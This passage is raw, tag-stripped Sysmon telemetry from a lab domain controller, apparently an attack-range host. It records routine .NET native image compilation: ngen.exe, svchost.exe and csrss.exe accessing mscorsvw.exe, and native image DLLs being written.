13:50:29.946{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9225-6005-0404-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:29.587{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9225-6005-0304-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:29.556{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9225-6005-0304-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:29.556{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9225-6005-0304-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:29.352{59A5CD1D-9222-6005-0204-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12a0-0\System.Activities.dll2021-01-18 13:50:29.352 10341000x80000000000000008269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9227-6005-0804-00000000A301}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.930{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9227-6005-0804-00000000A301}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.930{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9227-6005-0804-00000000A301}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.727{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9227-6005-0704-00000000A301}3260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.712{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9227-6005-0704-00000000A301}3260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.712{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9227-6005-0704-00000000A301}3260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:31.649{59A5CD1D-9227-6005-0604-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b7c-0\System.Activities.DurableInstancing.dll2021-01-18 13:50:31.649 10341000x80000000000000008262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9227-6005-0604-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.305{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9227-6005-0604-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.305{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9227-6005-0604-00000000A301}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.212{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9227-6005-0504-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.196{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9227-6005-0504-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:31.196{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9227-6005-0504-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:31.102{59A5CD1D-9225-6005-0404-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9e4-0\System.Activities.Core.Presentation.dll2021-01-18 13:50:31.102 10341000x80000000000000008276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:34.930{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922A-6005-0A04-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:34.915{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922A-6005-0A04-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:34.915{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922A-6005-0A04-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:34.852{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922A-6005-0904-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:34.837{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922A-6005-0904-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:34.837{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922A-6005-0904-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 